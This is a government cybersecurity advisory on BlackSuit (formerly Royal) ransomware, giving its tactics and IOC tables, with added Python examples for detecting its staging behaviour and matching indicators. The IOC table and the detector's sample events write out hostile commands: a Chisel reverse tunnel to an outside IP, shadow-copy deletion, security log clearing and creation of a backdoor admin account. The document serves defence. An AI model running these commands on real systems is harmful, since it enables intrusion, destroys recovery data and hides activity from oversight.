Source: https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-061a

Cybersecurity Advisory


#STOPRANSOMWARE: BLACKSUIT (ROYAL) RANSOMWARE

Last Revised: August 07, 2024
Alert Code: AA23-061A
Related topics: Cyber Threats and Advisories; Incident Detection, Response, and
Prevention; Malware, Phishing, and Ransomware


ACTIONS FOR ORGANIZATIONS TO TAKE TODAY TO MITIGATE CYBER THREATS RELATED TO
BLACKSUIT RANSOMWARE ACTIVITY

 1. Prioritize remediating known exploited vulnerabilities.
 2. Train users to recognize and report phishing attempts.
 3. Enable and enforce multifactor authentication.


SUMMARY

Note: This joint Cybersecurity Advisory is part of an ongoing #StopRansomware
effort to publish advisories for network defenders that detail various
ransomware variants and ransomware threat actors. These #StopRansomware
advisories include recently and historically observed tactics, techniques, and
procedures (TTPs) and indicators of compromise (IOCs) to help organizations
protect against ransomware. Visit stopransomware.gov to see all
#StopRansomware advisories and to learn more about other ransomware threats and
no-cost resources.

Note: This advisory, originally published March 2, 2023, has been updated twice:

 * November 13, 2023: The advisory was updated to share new Royal TTPs and IOCs.
 * August 7, 2024: The advisory was updated to notify network defenders of the
   rebrand of “Royal” ransomware actors to “BlackSuit.” The update includes new
   TTPs, IOCs, and detection methods related to BlackSuit ransomware. “Royal”
   was updated to “BlackSuit” throughout unless referring to legacy Royal
   activity. Updates and new content are noted.

(New August 7, 2024) The Federal Bureau of Investigation (FBI) and the
Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint
advisory to disseminate known BlackSuit ransomware IOCs and TTPs identified
through FBI threat response activities and third-party reporting as recently as
July 2024. BlackSuit ransomware is the evolution of the ransomware previously
identified as Royal ransomware, which was used from approximately September 2022
through June 2023. BlackSuit shares numerous coding similarities with Royal
ransomware and has exhibited improved capabilities.

(Updated August 7, 2024) BlackSuit conducts data exfiltration and extortion
prior to encryption and then publishes victim data to a leak site if a ransom is
not paid. Phishing emails are among the most successful vectors for initial
access by BlackSuit threat actors. After gaining access to victims’ networks,
BlackSuit actors disable antivirus software and exfiltrate large amounts of data
before ultimately deploying the ransomware and encrypting the systems. 

(Updated August 7, 2024) Ransom demands have typically ranged from approximately
$1 million to $10 million USD, with payment demanded in Bitcoin. BlackSuit
actors have demanded over $500 million USD in total and the largest individual
ransom demand was $60 million. BlackSuit actors have exhibited a willingness to
negotiate payment amounts. Ransom amounts are not part of the initial ransom
note, but require direct interaction with the threat actor via a .onion URL
(reachable through the Tor browser) provided after encryption. Recently, an
uptick was observed in the number of instances where victims received telephonic
or email communications from BlackSuit actors regarding the compromise and
ransom. BlackSuit uses a leak site to publish victim data based on non-payment.

FBI and CISA encourage organizations to implement the recommendations found in
the Mitigations section of this CSA to reduce the likelihood and impact of
ransomware incidents.

Download the PDF version of this report: AA23-061A #StopRansomware BlackSuit
(Royal) Ransomware (PDF, 657.64 KB)

For a downloadable copy of IOCs, see:

 * AA23-061A STIX XML (MAR 2023) (XML, 114.26 KB)
 * AA23-061A STIX XML (NOV 2023 Update) (XML, 152.94 KB)
 * AA23-061A STIX JSON (NOV 2023 Update) (JSON, 113.96 KB)
 * AA23-061A STIX XML (BlackSuit) (XML, 247.66 KB)
 * AA23-061A STIX JSON (BlackSuit) (JSON, 167.21 KB)


TECHNICAL DETAILS

Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 15.
See the MITRE ATT&CK Tactics and Techniques section for a table of the threat
actors’ activity mapped to MITRE ATT&CK tactics and techniques. For assistance
with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA
and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider
Tool.


INITIAL ACCESS

BlackSuit uses a unique partial encryption approach that allows the threat actor
to choose a specific percentage of data in a file to encrypt. This approach
allows the actor to lower the encryption percentage for larger files, which
helps evade detection, and also significantly improves ransomware speed.[1] In
addition to encrypting files, BlackSuit actors also engage in double extortion
tactics in which they threaten to publicly release the exfiltrated data if the
victim does not pay the ransom.

BlackSuit actors gain initial access to victim networks in several ways,
including:

 * Phishing. According to third-party reporting, BlackSuit actors most commonly
   gain initial access to victim networks via phishing emails [T1566].
   * According to open source reporting, victims have unknowingly installed
     malware that delivers BlackSuit ransomware after receiving phishing emails
     containing malicious PDF documents [T1566.001] and malvertising
     [T1566.002].[2]
 * Remote Desktop Protocol (RDP). The second most common vector (around 13.3% of
   incidents) BlackSuit actors use for initial access is RDP compromise
   [T1021.001].
 * Public-facing applications. FBI has observed BlackSuit actors gain initial
   access through exploiting vulnerable public-facing applications [T1190].
 * Brokers. Reports from trusted third-party sources indicate that BlackSuit
   actors may leverage initial access brokers to gain initial access and source
   traffic by harvesting virtual private network (VPN) credentials from stealer
   logs [T1650].


COMMAND AND CONTROL

Once BlackSuit actors gain access to a network, they communicate with command
and control (C2) infrastructure and download multiple tools [T1105]. Legitimate
Windows software is repurposed by BlackSuit actors to strengthen their foothold
within the victim’s network. Ransomware operators often use open source
projects to aid their intrusion activities.

Historically, Royal actors were observed leveraging Chisel, Secure Shell (SSH)
client, PuTTY, OpenSSH, and MobaXterm [T1572] to communicate with their C2
infrastructure.


LATERAL MOVEMENT AND PERSISTENCE

(Updated August 7, 2024) Historically, Royal threat actors used RDP and
legitimate operating system (OS) diagnostic tools to move laterally across a
network [T1021.001]. BlackSuit actors used RDP and PsExec as well but also use
SMB [T1021.001] to move laterally. In one confirmed case, BlackSuit actors used
a legitimate admin account [T1078] to remotely log on to the domain controller
via SMB. Once on the domain controller, the threat actor deactivated antivirus
software [T1562.001] by modifying Group Policy Objects [T1484.001].

(Updated August 7, 2024) FBI observed BlackSuit actors using legitimate remote
monitoring and management (RMM) software to maintain persistence in victim
networks [T1133].

(New August 7, 2024) BlackSuit actors use SystemBC and Gootloader malware to
load additional tools and maintain persistence.


DISCOVERY AND CREDENTIAL ACCESS

(New August 7, 2024) BlackSuit actors have been observed using SharpShares and
SoftPerfect NetWorx to enumerate victim networks. The publicly available
credential stealing tool Mimikatz and password harvesting tools from Nirsoft
have also been found on victim systems. Tools such as PowerTool and GMER are
often used to kill system processes.


EXFILTRATION

BlackSuit actors exfiltrate data from victim networks by repurposing legitimate
cyber penetration testing tools, such as Cobalt Strike, and malware
tools/derivatives, such as Ursnif/Gozi, for data aggregation and exfiltration.
According to third-party reporting, BlackSuit actors’ first hop in exfiltration
and other operations is usually a U.S. IP address.

(New August 7, 2024) BlackSuit actors also use RClone and Brute Ratel for
exfiltration.


ENCRYPTION

Before starting the encryption process, BlackSuit actors:

 * Use Windows Restart Manager to determine whether targeted files are currently
   in use or blocked by other applications [T1486].[1]
 * Use vssadmin.exe, the command-line tool for the Windows Volume Shadow Copy
   service, to delete shadow copies and inhibit system recovery.[1]

FBI has found numerous batch (.bat) files on impacted systems, typically
transferred as an encrypted 7zip archive. The batch files create a new admin
user [T1078.002], force a Group Policy update, set pertinent registry keys to
auto-extract [T1119] and execute the ransomware, monitor the encryption
process, and delete files upon completion, including the Application, System,
and Security event logs [T1070.001]. The registry keys they create can be
modified and deleted to enable persistence on the victim’s system.

Malicious files have been found in victim networks in the following directories:

 * C:\Temp\
 * C:\Users\<user>\AppData\Roaming\
 * C:\Users\<users>\
 * C:\ProgramData\

Root C:\ directory has also served as a storage location for malicious files.
BlackSuit actors have been observed using legitimate software and open source
tools during ransomware operations.
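The Command and Control section above (Chisel tunnelling, with the renamed
conhost.exe command line shown in Table 6) and the pre-encryption steps just
described (vssadmin shadow copy deletion, a batch-created admin user, a forced
Group Policy update, event log clearing, and batch files dropped in the listed
directories) all leave process-creation records. The Python below is an added
example written for this page, not CISA or FBI tooling: it encodes each
behaviour as a rule over constructed process-creation events and alerts only on
hosts where several distinct behaviours fire, because any one of them (a
gpupdate /force in particular) is routine on its own. The host names, the
svc_backup account, the sample command lines and the short allow-list of system
binaries are assumptions made for the example.

```python
"""Rule-based sweep of process-creation events for the staging behaviour the
advisory describes (shadow copy deletion, new admin user, gpupdate /force, event
log clearing, batch files in the listed drop directories, renamed Chisel binary).
Constructed example; not CISA or FBI tooling."""
import re
from collections import defaultdict
from dataclasses import dataclass
from ntpath import basename


@dataclass
class ProcEvent:
    """One process-creation record (e.g. Sysmon Event ID 1 or Security 4688)."""
    host: str
    image: str      # full path of the created process
    cmdline: str


# Drop locations from the Encryption section: C:\Temp, C:\ProgramData,
# C:\Users\<user>\, C:\Users\<user>\AppData\Roaming\ and the C:\ root.
STAGING_RE = re.compile(
    r"^c:\\(?:temp\\|programdata\\|users\\[^\\]+\\(?:appdata\\roaming\\)?)?[^\\]+$", re.I)
PATH_RE = re.compile(r"[a-z]:\\[^\"\s]+", re.I)
# Chisel client syntax exactly as shown in Table 6: client <host>:<port> R:<host>:<port>:socks
CHISEL_RE = re.compile(r"\bclient\s+\S+:\d+\s+R:\S*:\d+:socks\b", re.I)
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
SYSTEM_BINARIES = {"conhost.exe", "svchost.exe", "rundll32.exe"}  # assumption: small allow-list


def shadow_copy_deletion(e):
    return basename(e.image).lower() == "vssadmin.exe" and bool(
        re.search(r"delete\s+shadows", e.cmdline, re.I))

def event_log_clear(e):
    return basename(e.image).lower() == "wevtutil.exe" and bool(re.search(
        r"\b(?:cl|clear-log)\s+(?:application|system|security)\b", e.cmdline, re.I))

def new_admin_user(e):
    return basename(e.image).lower() in ("net.exe", "net1.exe") and bool(re.search(
        r"\b(?:user\s+\S+(?:\s+\S+)?|localgroup\s+administrators\s+\S+)\s+/add\b",
        e.cmdline, re.I))

def gpupdate_force(e):
    return basename(e.image).lower() == "gpupdate.exe" and "/force" in e.cmdline.lower()

def chisel_tunnel(e):
    return CHISEL_RE.search(e.cmdline) is not None

def renamed_system_binary(e):
    # Table 6: Chisel ran as C:\Users\Public\conhost.exe, i.e. a system binary
    # name outside the system directories.
    img = e.image.lower()
    return basename(img) in SYSTEM_BINARIES and not img.startswith(SYSTEM_DIRS)

def staging_dir(e):
    return any(STAGING_RE.match(p) for p in [e.image, *PATH_RE.findall(e.cmdline)])

RULES = [shadow_copy_deletion, event_log_clear, new_admin_user, gpupdate_force,
         chisel_tunnel, renamed_system_binary, staging_dir]


def sweep(events):
    """Map host -> set of rule names that fired on that host."""
    findings = defaultdict(set)
    for e in events:
        for rule in RULES:
            if rule(e):
                findings[e.host].add(rule.__name__)
    return dict(findings)

def alert_hosts(findings, threshold=3):
    """Hosts where at least `threshold` distinct behaviours fired; a single hit
    such as a lone gpupdate /force is routine admin noise."""
    return sorted(h for h, rules in findings.items() if len(rules) >= threshold)


# Constructed sample events; hostnames and the svc_backup account are invented.
SAMPLE_EVENTS = [
    ProcEvent("WS-FIN-07", r"C:\Users\Public\conhost.exe",
              r"C:\Users\Public\conhost.exe client 149.28.73.161:443 R:149.28.73.161:43657:socks"),
    ProcEvent("WS-FIN-07", r"C:\Windows\System32\cmd.exe", r"cmd.exe /c C:\Temp\runanddelete.bat"),
    ProcEvent("WS-FIN-07", r"C:\Windows\System32\net.exe", "net user svc_backup Passw0rd123 /add"),
    ProcEvent("WS-FIN-07", r"C:\Windows\System32\net.exe", "net localgroup administrators svc_backup /add"),
    ProcEvent("WS-FIN-07", r"C:\Windows\System32\gpupdate.exe", "gpupdate /force"),
    ProcEvent("WS-FIN-07", r"C:\Windows\System32\vssadmin.exe", "vssadmin.exe delete shadows /all /quiet"),
    ProcEvent("WS-FIN-07", r"C:\Windows\System32\wevtutil.exe", "wevtutil.exe cl Security"),
    # benign: the real conhost.exe from System32
    ProcEvent("WS-FIN-07", r"C:\Windows\System32\conhost.exe",
              r"\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
    # benign: an administrator refreshing policy on another host
    ProcEvent("WS-HR-02", r"C:\Windows\System32\gpupdate.exe", "gpupdate /force"),
]

if __name__ == "__main__":
    found = sweep(SAMPLE_EVENTS)
    for host, rules in found.items():
        print(host, sorted(rules))
    print("alert:", alert_hosts(found))
```

On the constructed events WS-FIN-07 trips all seven rules and is alerted, while
WS-HR-02 only trips gpupdate_force and stays below the threshold. In production
the rules would read Sysmon or 4688 telemetry and the threshold would be
applied per host within a time window rather than over the whole log.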


INDICATORS OF COMPROMISE (IOCS)

See Table 1 through Table 5 for Royal ransomware IOCs obtained by FBI during
threat response activities as of January 2023.

(New November 13, 2023) See Table 6 and Table 7 for Royal and BlackSuit
Ransomware IOCs as of June 2023. See Table 8 for a list of legitimate software
used by Royal and BlackSuit threat actors identified through FBI investigations
as of June 2023.

(New August 7, 2024) See Table 9 through Table 15 for BlackSuit ransomware IOCs
obtained by FBI during threat response activities as of July 2024 and Figure 1
for a sample ransom note.

Disclaimer: Some of the observed IP addresses are several years old. FBI and
CISA recommend vetting or investigating these IP addresses prior to taking
forward-looking action, such as blocking.


ROYAL IOCS AS OF JANUARY 2023

Table 1: Royal Ransomware Associated Files as of January 2023

IOC | Description
.royal | Encrypted file extension
README.TXT | Ransom note

Table 2: Royal Ransomware Associated IP Addresses as of January 2023

Malicious IP | Last Observed Activity
102.157.44[.]105 | November 2022
105.158.118[.]241 | November 2022
105.69.155[.]85 | November 2022
113.169.187[.]159 | November 2022
134.35.9[.]209 | November 2022
139.195.43[.]166 | November 2022
139.60.161[.]213 | November 2022
148.213.109[.]165 | November 2022
163.182.177[.]80 | November 2022
181.141.3[.]126 | November 2022
181.164.194[.]228 | November 2022
185.143.223[.]69 | November 2022
186.64.67[.]6 | November 2022
186.86.212[.]138 | November 2022
190.193.180[.]228 | November 2022
196.70.77[.]11 | November 2022
197.11.134[.]255 | November 2022
197.158.89[.]85 | November 2022
197.204.247[.]7 | November 2022
197.207.181[.]147 | November 2022
197.207.218[.]27 | November 2022
197.94.67[.]207 | November 2022
23.111.114[.]52 | November 2022
41.100.55[.]97 | November 2022
41.107.77[.]67 | November 2022
41.109.11[.]80 | November 2022
41.251.121[.]35 | November 2022
41.97.65[.]51 | November 2022
42.189.12[.]36 | November 2022
45.227.251[.]167 | November 2022
5.44.42[.]20 | November 2022
61.166.221[.]46 | November 2022
68.83.169[.]91 | November 2022
81.184.181[.]215 | November 2022
82.12.196[.]197 | November 2022
98.143.70[.]147 | November 2022
140.82.48[.]158 | December 2022
147.135.36[.]162 | December 2022
147.135.11[.]223 | December 2022
152.89.247[.]50 | December 2022
172.64.80[.]1 | December 2022
179.43.167[.]10 | December 2022
185.7.214[.]218 | December 2022
193.149.176[.]157 | December 2022
193.235.146[.]104 | December 2022
209.141.36[.]116 | December 2022
45.61.136[.]47 | December 2022
45.8.158[.]104 | December 2022
5.181.234[.]58 | December 2022
5.188.86[.]195 | December 2022
77.73.133[.]84 | December 2022
89.108.65[.]136 | December 2022
94.232.41[.]105 | December 2022
47.87.229[.]39 | January 2023

Table 3: Royal Ransomware Associated Domains as of January 2023

Malicious Domain | Last Observed Activity
sombrat[.]com | October 2022
gororama[.]com | November 2022
softeruplive[.]com | November 2022
altocloudzone[.]live | December 2022
ciborkumari[.]xyz | December 2022
myappearinc[.]com | December 2022
parkerpublic[.]com | December 2022
pastebin.mozilla[.]org/Z54Vudf9/raw | December 2022
tumbleproperty[.]com | December 2022
myappearinc[.]com/acquire/draft/c7lh0s5jv | January 2023

Table 4: Tools Used by Royal Operators

Tool | SHA256
AV tamper | 8A983042278BC5897DBCDD54D1D7E3143F8B7EAD553B5A4713E30DEFFDA16375
TCP/UDP Tunnel over HTTP (Chisel) | 8a99353662ccae117d2bb22efd8c43d7169060450be413af763e8ad7522d2451
Ursnif/Gozi | be030e685536eb38ba1fec1c90e90a4165f6641c8dc39291db1d23f4ee9fa0b1
Exfil | B8C4AEC31C134ADBDBE8AAD65D2BCB21CFE62D299696A23ADD9AA1DE082C6E20
Remote Access (AnyDesk) | 4a9dde3979c2343c024c6eeeddff7639be301826dd637c006074e04a1e4e9fe7
PowerShell Toolkit Downloader | 4cd00234b18e04dcd745cc81bb928c8451f6601affb5fa45f20bb11bfb5383ce
PsExec (Microsoft Sysinternals) | 08c6e20b1785d4ec4e3f9956931d992377963580b4b2c6579fd9930e08882b1c
Keep Host Unlocked (Don’t Sleep) | f8cff7082a936912baf2124d42ed82403c75c87cb160553a7df862f8d81809ee
Ransomware Executable | d47d4b52e75e8cf3b11ea171163a66c06d1792227c1cf7ca49d7df60804a1681
Windows Command Line (NirCmd) | 216047C048BF1DCBF031CF24BD5E0F263994A5DF60B23089E393033D17257CB5
System Management (NSudo) | 19896A23D7B054625C2F6B1EE1551A0DA68AD25CDDBB24510A3B74578418E618


Table 5: Batch Script Tools Used by Royal Operators

Hash values are given as in the source; the 40-character values are SHA-1
length and the 64-character values are SHA-256 length.

File name | Hash Value
2.bat | 585b05b290d241a249af93b1896a9474128da969
3.bat | 41a79f83f8b00ac7a9dd06e1e225d64d95d29b1d
4.bat | a84ed0f3c46b01d66510ccc9b1fc1e07af005c60
8.bat | c96154690f60a8e1f2271242e458029014ffe30a
kl.bat | 65dc04f3f75deb3b287cca3138d9d0ec36b8bea0
gp.bat | 82f1f72f4b1bfd7cc8afbe6d170686b1066049bc7e5863b51aa15ccc5c841f58
r.bat | 74d81ef0be02899a177d7ff6374d699b634c70275b3292dbc67e577b5f6a3f3c
runanddelete.bat | 342B398647073159DFA8A7D36510171F731B760089A546E96FBB8A292791EFEE
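Tables 2 through 5 give indicators in defanged form ([.] in place of .) and
with a last-observed date, and the disclaimer above asks that older addresses
be vetted before blocking. The following Python is an added example, not part
of the advisory or any CISA tool: it refangs a handful of indicators copied from
Tables 2, 3 and 4, sweeps constructed sample log lines for them, and flags
network indicators older than a year for analyst review rather than for
automatic blocking. Entries from Table 3 that carry a path are matched as full
URLs, not as domains, so that a shared service such as pastebin.mozilla.org is
not blocked wholesale. The sample log lines, internal addresses and the
twelve-month staleness threshold are assumptions made for the example.

```python
"""Refang the defanged indicators from Tables 2 through 4 and sweep sample
telemetry for them, tagging stale network indicators for analyst vetting.
Added example; not part of the advisory."""
import re
from datetime import date, datetime

# Indicators copied from Tables 2, 3 and 4 above, in the advisory's defanged
# form, with the "Last Observed Activity" column (or the tool name for hashes).
ROYAL_IPS = {
    "102.157.44[.]105": "November 2022",
    "94.232.41[.]105": "December 2022",
    "47.87.229[.]39": "January 2023",
}
ROYAL_DOMAINS = {
    "sombrat[.]com": "October 2022",
    "gororama[.]com": "November 2022",
}
# Entries with a path are URLs, not domains: pastebin.mozilla.org is a shared
# service, so only the full URL should be treated as malicious.
ROYAL_URLS = {
    "pastebin.mozilla[.]org/Z54Vudf9/raw": "December 2022",
    "myappearinc[.]com/acquire/draft/c7lh0s5jv": "January 2023",
}
ROYAL_SHA256 = {
    "8a99353662ccae117d2bb22efd8c43d7169060450be413af763e8ad7522d2451": "TCP/UDP Tunnel over HTTP (Chisel)",
    "D47D4B52E75E8CF3B11EA171163A66C06D1792227C1CF7CA49D7DF60804A1681": "Ransomware Executable",
}


def refang(indicator: str) -> str:
    """Undo report-style defanging: '[.]' -> '.', 'hxxp' -> 'http'."""
    s = indicator.strip().replace("[.]", ".")
    return re.sub(r"^hxxp(s?)://", r"http\1://", s, flags=re.IGNORECASE)

def build_iocset(ips=ROYAL_IPS, domains=ROYAL_DOMAINS, urls=ROYAL_URLS, hashes=ROYAL_SHA256):
    """Normalize every indicator once so matching is exact and case-insensitive."""
    return {
        "ip": {refang(k): v for k, v in ips.items()},
        "domain": {refang(k).lower(): v for k, v in domains.items()},
        "url": {refang(k).lower(): v for k, v in urls.items()},
        "sha256": {k.lower(): v for k, v in hashes.items()},
    }

IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
SHA256_RE = re.compile(r"\b[0-9a-fA-F]{64}\b")
HOST_RE = re.compile(r"\b((?:[a-z0-9-]+\.)+[a-z]{2,})\b", re.IGNORECASE)

def scan_line(line: str, iocs: dict) -> list:
    """Return (type, indicator, context) tuples for every IOC found in one log line."""
    hits = []
    for ip in IP_RE.findall(line):
        if ip in iocs["ip"]:
            hits.append(("ip", ip, iocs["ip"][ip]))
    for h in SHA256_RE.findall(line):
        if h.lower() in iocs["sha256"]:
            hits.append(("sha256", h.lower(), iocs["sha256"][h.lower()]))
    lowered = line.lower()
    for url, ctx in iocs["url"].items():
        if url in lowered:
            hits.append(("url", url, ctx))
    for host in HOST_RE.findall(line):
        host = host.lower()
        for dom, ctx in iocs["domain"].items():
            if host == dom or host.endswith("." + dom):   # domain or any subdomain
                hits.append(("domain", host, ctx))
    return hits

def months_since(last_seen: str, today: date) -> int:
    """Age in whole months of a 'Month YYYY' last-observed value."""
    seen = datetime.strptime(last_seen, "%B %Y")
    return (today.year - seen.year) * 12 + (today.month - seen.month)

def triage(logs, iocs, today, stale_after_months=12):
    """Sweep log lines; mark network IOCs older than the threshold as stale so an
    analyst vets them before blocking, as the advisory's disclaimer asks.
    File hashes are not dated in the tables, so they are never marked stale."""
    report = []
    for line in logs:
        for kind, ind, ctx in scan_line(line, iocs):
            age = None if kind == "sha256" else months_since(ctx, today)
            report.append({"type": kind, "indicator": ind, "last_seen": ctx,
                           "age_months": age,
                           "stale": age is not None and age > stale_after_months,
                           "line": line})
    return report

# Constructed sample telemetry (firewall, proxy, EDR, DNS); not from a real incident.
SAMPLE_LOGS = [
    "2023-01-14T03:12:09Z fw deny src=10.20.1.17 dst=47.87.229.39 dport=443 proto=tcp",
    "2023-01-14T03:12:11Z proxy GET http://myappearinc.com/acquire/draft/c7lh0s5jv 200",
    "2023-01-14T03:15:40Z edr file_create path=C:\\Temp\\conhost.exe "
    "sha256=8A99353662CCAE117D2BB22EFD8C43D7169060450BE413AF763E8AD7522D2451",
    "2023-01-14T03:16:02Z proxy GET https://www.example.org/ 200",
    "2023-01-14T03:17:30Z dns query=cdn.sombrat.com type=A",
]
IOCS = build_iocset()

def run_sample(today=date(2024, 8, 7)):
    """Sweep the constructed logs as of the advisory's revision date."""
    return triage(SAMPLE_LOGS, IOCS, today)

if __name__ == "__main__":
    for hit in run_sample(date.today()):
        flag = "VET BEFORE BLOCKING" if hit["stale"] else "recent"
        print(f'{hit["type"]:7} {hit["indicator"]:45} {hit["last_seen"]:35} {flag}')
```

Against the sample lines the sweep returns one IP hit, one URL hit, one hash
hit and one subdomain hit; as of the August 2024 revision date every network
indicator in the January 2023 tables is well past the twelve-month threshold,
which is exactly why the disclaimer asks for vetting rather than blind blocking.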


ROYAL AND BLACKSUIT IOCS AS OF JUNE 2023 (NEW NOVEMBER 13, 2023)

Table 6: Royal Ransomware Associated Files, Tools, and Hashes as of June 2023

The last five hash values are 40 hexadecimal characters (SHA-1 length) although
the source labels the column SHA-256.

Name | Description or SHA-256 Hash Value
C:\Users\Public\conhost.exe client 149.28.73.161:443 R:149.28.73.161:43657:socks | Executed on the victim’s machine; uses a Chisel client to tunnel traffic through port 443 instead of port 43657.
royal_w | Encryption extension
%PROGRAMDATA% | Ransomware filepath
%TEMP%\execute.bat |
InstallerV20.8.msi |
windows_encryptor.exe | 85087f28a84205e344d7e8e06979e6622fab0cfe1759fd24e38cd0390bca5fa6
%PROGRAMDATA%\wine.exe | 5b08c02c141eab94a40b56240a26cab7ff07e9a6e760dfde8b8b053a3526f0e6
%USERPROFILE%\Downloads\run1.bat | bc609cf53dde126b766d35b5bcf0a530c24d91fe23633dad6c2c59fd1843f781
%USERPROFILE%\Downloads\run2.bat | 13c25164791d3436cf2efbc410caec6b6dd6978d7e83c4766917630e24e1af10
%USERPROFILE%\Downloads\run3.bat | 2b93206d7a36cccdf7d7596b90ead301b2ff7e9a96359f39b6ba31bb13d11f45
%USERPROFILE%\Downloads\run4.bat | 84e1efbed6bb7720caea6720a8bff7cd93b5d42fb1d71ef8031bfd3897ed4435
%USERPROFILE%\Downloads\sc.bat | e0dbe3a2d07ee10731b68a142c65db077cfb88e5ec5c8415e548d3ede40e7ffc
%USERPROFILE%\Downloads\sr.bat | 34a98f2b54ebab999f218b0990665485eb2bb74babdf7e714cc10a306616b00c
runanddelete.bat | 342b398647073159dfa8a7d36510171f731b760089a546e96fbb8a292791efee
scripttodo.ps1 (94.232.41.105) | 4cd00234b18e04dcd745cc81bb928c8451f6601affb5fa45f20bb11bfb5383ce
dontsleep.exe | f8cff7082a936912baf2124d42ed82403c75c87cb160553a7df862f8d81809ee
wstart.exe | d47d4b52e75e8cf3b11ea171163a66c06d1792227c1cf7ca49d7df60804a1681
InstallerV8.1.ms | 3e6e2e0de75896033d91dfd07550c478590ca4cd4598004d9e19246e8a09cb97
shutdowni.bat | 8a983042278bc5897dbcdd54d1d7e3143f8b7ead553b5a4713e30deffda16375
f827.exe | 5654f32a4f0f2e900a35761e8caf7ef0c50ee7800e0a3b19354b571bc6876f61
d2ef5.exe | be030e685536eb38ba1fec1c90e90a4165f6641c8dc39291db1d23f4ee9fa0b1
f24dc8ea.msi | 91605641a4c7e859b7071a9841d1cd154b9027e6a58c20ec4cadafeaf47c9055
defw10.bat | fb638dba20e5fec72f5501d7e0627b302834ec5eaf331dd999763ee925cbc0f9
ll.exe | f0197bd7ccd568c523df9c7d9afcbac222f14d344312322c04c92e7968859726
Royal Ransomware Hash | b987f738a1e185f71e358b02cafa5fe56a4e3457df3b587d6b40e9c9de1da410
b34v2.dll | a51b1f1f0636bff199c0f87e2bb300d42e06698b
1.exe | d93f1ef533e6b8c95330ba0962e3670eaf94a026
34.dll | 9e19afc15c5781e8a89a75607578760aabad8e65
ll.exe | 9a92b147cad814bfbd4632b6034b8abf8d84b1a5
Royal Ransomware Hash | a4ef01d55e55cebdd37ba71c28b0c448a9c833c0

Table 7: BlackSuit Ransomware Associated Files, Tools, and Hashes as of June 2023

The source labels the first column "IP Address" and the second "MD5 Hash
Value"; the entries are file names, and the values are 40 hexadecimal
characters (SHA-1 length).

Name | Hash Value
sys32.exe | 30cc7724be4a09d5bcd9254197af05e9fab76455
esxi_encryptor | 861793c4e0d4a92844994b640cc6bc3e20944a73

BlackSuit threat actors have been observed using legitimate software and open
source tools during ransomware operations. Threat actors have been observed
using open source network tunneling tools such as Chisel and Cloudflared, as
well as Secure Shell (SSH) Client, OpenSSH, and MobaXterm to establish SSH
connections. The publicly available credential stealing tool Mimikatz and
password harvesting tools from Nirsoft have also been found on victim systems.
Legitimate RMM tools have also been observed as backdoor access vectors. Some
legitimate software and open source tools can be found in Table 8.

Table 8: Legitimate Files and Tools Used by Royal and BlackSuit Ransomware

Name | Description or SHA-256 Hash Value
C:\Program Files\OpenSSH\ssh-agent.exe, C:\Program Files\OpenSSH\sshd.exe | SSH client
%USERPROFILE%\Downloads\WinRAR.exe | Compression tool
%APPDATA%\MobaXterm\ | Toolbox for remote computing
\Program Files (x86)\Mobatek\ | Toolbox for remote computing
\Program Files (x86)\Mobatek\MobaXterm\ | Toolbox for remote computing
b34v2.dll | Cobalt Strike Beacon
34.dll | Cobalt Strike Beacon
mimikatz.exe | Mimikatz credential harvester
dialuppass.exe | Nirsoft password harvesting utility
iepv.exe | Nirsoft password harvesting utility
mailpv.exe | Nirsoft password harvesting utility
netpass.exe | Nirsoft password harvesting utility
routerpassview.exe | Nirsoft password harvesting utility
AdFind.exe | AdFind tool
LogMeIn | Remote access tool
Atera | Remote access tool
C:\Program Files\Eraser\Eraser.exe | Anti-forensics tool used by the threat actor
advanced_ip_scanner.exe | Reconnaissance tool used by the threat actor
conhost.exe (chisel_windows_1_7_7.exe) | b9ef2e948a9b49a6930fc190b22cbdb3571579d37a4de56564e41a2ef736767b
%USERPROFILE%\Downloads\svvhost.exe, \Users\Administrator\AppData\Local\Temp\cloudflared.exe | c429719a45ca14f52513fe55320ebc49433c729a0d2223479d9d43597eab39fa
nircmd.exe | 216047c048bf1dcbf031cf24bd5e0f263994a5df60b23089e393033d17257cb5
nsudo.exe | 19896a23d7b054625c2f6b1ee1551a0da68ad25cddbb24510a3b74578418e618


IOCS AS OF JULY 2024 (NEW AUGUST 7, 2024)

Disclaimer: Several of these observed IP addresses were first observed as early
as 2023, although the most recent are from July of 2024 and have been
historically linked to BlackSuit (formerly known as Royal) Ransomware. IP
addresses in this advisory were maliciously used during the time range
highlighted below, and may have been used for legitimate purposes outside of
that time span. FBI and CISA recommend these IP addresses be investigated or
vetted by organizations prior to taking action, such as blocking.

Table 9: Malicious URL(s) associated with BlackSuit Ransomware

URL Association | Malicious URLs
URLs from malicious PowerShell on P0, potentially debug.ps1 | https://1tvnews[.]af/xmlrpc.php
URLs from malicious PowerShell on P0, potentially debug.ps1 | https://avpvuurwerk[.]nl/xmlrpc.php
URLs from malicious PowerShell on P0, potentially debug.ps1 | https://beautyhabits[.]gr/xmlrpc.php
URLs from malicious PowerShell on P0, potentially debug.ps1 | https://interpolyaris[.]ru/xmlrpc.php
URLs from malicious PowerShell on P0, potentially debug.ps1 | https://libertygospeltracts[.]com/xmlrpc.php
URLs from malicious PowerShell on P0, potentially debug.ps1 | https://oldtimertreffen-rethem[.]de/xmlrpc.php
URLs from malicious PowerShell on P0, potentially debug.ps1 | https://parencyivf[.]com/xmlrpc.php
URLs from malicious PowerShell on P0, potentially debug.ps1 | https://pikaluna[.]com/xmlrpc.php
URLs from malicious PowerShell on P0, potentially debug.ps1 | https://stroeck[.]at/xmlrpc.php
URL associated to BRC4 / Brute Ratel | megupdate[.]com
URLs associated to Exfiltration | mystuff[.]bublup[.]com
URLs associated to Exfiltration | backblaze[.]com
URLs associated to Exfiltration | api[.]backblazeb2[.]com
URL associated to Cobalt Strike C2 | provincial-gaiters-gw[.]aws-use1[.]cloud-ara[.]tyk[.]io
URL associated to Initial Access Download | zoommanager[.]com

Table 10: BlackSuit Ransomware Associated Files and Hash Values

Filename | Hash Value – SHA-256 | Description
1.exe | af9f95497b8503af1a399bc6f070c3bbeabc5aeecd8c09bca80495831ae71e61 | Encryptor
